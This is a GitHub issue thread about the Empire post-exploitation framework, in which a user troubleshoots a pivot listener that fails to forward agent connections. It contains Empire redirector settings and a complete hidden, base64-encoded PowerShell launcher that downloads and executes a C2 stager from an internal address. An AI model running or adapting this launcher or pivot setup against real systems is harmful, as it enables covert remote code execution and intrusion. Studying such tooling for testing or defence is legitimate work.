### ISSUE TITLE
pivot listener cant't forward connections

### ISSUE THREAD

**Issue by net2net** [EmpireProject/Empire#431]
## Empire Version
The Newsest version,i git clone 2017/1/12

## OS Information (Linux flavor, Python version)

kali2 

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
my test network envirement,
kali2,172.16.30.229 run empire 8080
mypc 172.16.30.222 agent

Name          Required    Value                     Description
  ----          --------    -------                   -----------
  Reset         False                                 Switch. Reset all redirectors on the
                                                      host
  ListenPort    False       8888                      Port to redirect from the agent machine
  AddAsListener False       True                      Switch. Add pivot as a listener in the
                                                      controller.
  Agent         True        FXZZ21XY31HLBR2D          Agent to run module on.
  Listener      False       test                      Listener to use for ConnectHost
                                                      autoconfig.
  ShowAll       False                                 Switch. Show all current redirectors.
  ConnectHost   False                                 HOST:PORT or http[s]://HOST[:PORT] to
                                                      redirect traffic to.
(Empire: management/redirector) > execute
[*] Added pivot listener on port 9999
(Empire: management/redirector) >
[+] successfully added redirector on port 9999 to http://172.16.30.229:8080

everything goes well.

then i back to listener 
  ID    Name              Host                                 Type      Delay/Jitter   KillDate    Redirect Target
  --    ----              ----                                 -------   ------------   --------    ---------------
  1     test              http://172.16.30.229:8080            native    5/0.0
  2     FXZZ21XY31HLBR2D  http://172.16.30.222 fe80::78ff:bd77:5c:6ed6 192.168.23.1 fe80::30ce:1cee:2c44:a3cb 192.168.254.1 fe80::18de:9a68:fc54:92da:9999pivot     5/0.0                      test

(Empire: listeners) > launcher FXZZ21XY31HLBR2D
powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAcwBUAGUATQAuAE4AZQBUAC4AUwBlAFIAdgBJAEMAZQBQAE8ASQBOAFQATQBBAG4AYQBHAGUAcgBdADoAOgBFAHgAcABlAGMAdAAxADAAMABDAG8AbgB0AGkATgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBFAFcALQBPAGIAagBlAGMAVAAgAFMAeQBTAHQAZQBtAC4ATgBlAFQALgBXAEUAYgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgAZQBhAGQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBvAFgAWQAgAD0AIABbAFMAWQBzAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBSAGUAUQBVAEUAcwB0AF0AOgA6AEQAZQBmAEEAdQBMAHQAVwBFAGIAUABSAE8AeABZADsAJABXAGMALgBQAFIATwB4AHkALgBDAHIAZQBkAGUATgB0AGkAQQBsAFMAIAA9ACAAWwBTAHkAcwBUAEUAbQAuAE4ARQB0AC4AQwByAEUAZABFAE4AVABJAGEAbABDAGEAQwBIAGUAXQA6ADoARABlAEYAQQB1AGwAVABOAEUAVABXAG8AUgBrAEMAcgBlAGQAZQBOAHQASQBhAEwAUwA7ACQASwA9ACcAMQBhADEAZABjADkAMQBjADkAMAA3ADMAMgA1AGMANgA5ADIANwAxAGQAZABmADAAYwA5ADQANABiAGMANwAyACcAOwAkAGkAPQAwADsAWwBjAGgAYQByAFsAXQBdACQAQgA9ACgAWwBDAGgAYQByAFsAXQBdACgAJAB3AGMALgBEAE8AdwBOAGwATwBBAEQAUwB0AFIAaQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAxADYALgAzADAALgAyADIAMgAgAGYAZQA4ADAAOgA6ADcAOABmAGYAOgBiAGQANwA3ADoANQBjADoANgBlAGQANgAgADEAOQAyAC4AMQA2ADgALgAyADMALgAxACAAZgBlADgAMAA6ADoAMwAwAGMAZQA6ADEAYwBlAGUAOgAyAGMANAA0ADoAYQAzAGMAYgAgADEAOQAyAC4AMQA2ADgALgAyADUANAAuADEAIABmAGUAOAAwADoAOgAxADgAZABlADoAOQBhADYAOAA6AGYAYwA1ADQAOgA5ADIAZABhADoAOQA5ADkAOQAvAGkAbgBkAGUAeAAuAGEAcwBwAD8AYQBIAFIAMABjAEQAbwB2AEwAegBFADMATQBpADQAeABOAGkANAB6AE0AQwA0AHkATQBqAEkAZwBaAG0AVQA0AE0ARABvADYATgB6AGgAbQBaAGoAcABpAFoARABjADMATwBqAFYAagBPAGoAWgBsAFoARABZAGcATQBUAGsAeQBMAGoARQAyAE8AQwA0AHkATQB5ADQAeAAKAEkARwBaAGwATwBEAEEANgBPAGoATQB3AFkAMgBVADYATQBXAE4AbABaAFQAbwB5AFkAegBRADAATwBtAEUAegBZADIASQBnAE0AVABrAHkATABqAEUAMgBPAEMANAB5AE4AVABRAHUATQBTAEIAbQBaAFQAZwB3AE8AagBvAHgATwBHAFIAbABPAGoAbABoAE4AagBnADYACgBaAG0ATQAxAE4ARABvADUATQBtAFIAaABPAGoAawA1AE8AVABrAD0AIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQASwBbACQASQArACsAJQAkAGsALgBMAGUATgBnAFQASABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAGkAbgAnACcAKQA=

use this payload to run on other 172.16.30.221,not conect,

I decrypt the payload ,
i found powershell code downloadstring ip mabey error????

is it this resion?? 

so i modify the empire.db ,
2|FXZZ21XY31HLBR2D|http://172.16.30.222 fe80::78ff:bd77:5c:6ed6 192.168.23.1 fe80::30ce:1cee:2c44:a3cb 192.168.254.1 fe80::18de:9a68:fc54:92da:9999|9999||1a1dc91c907325c69271ddf0c944bc72|5|0.0|/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|||pivot|test|60

update the pivot lister  name to 
http://172.16.30.222;9999

but ,it crashed.

so ?what's wrong?

i come fom asia,is it the charset encoding error? or others?

**Comment by xorrior** [comment]
Which branch are you using @net2net ?

**Comment by xorrior** [comment]
Closing, no response
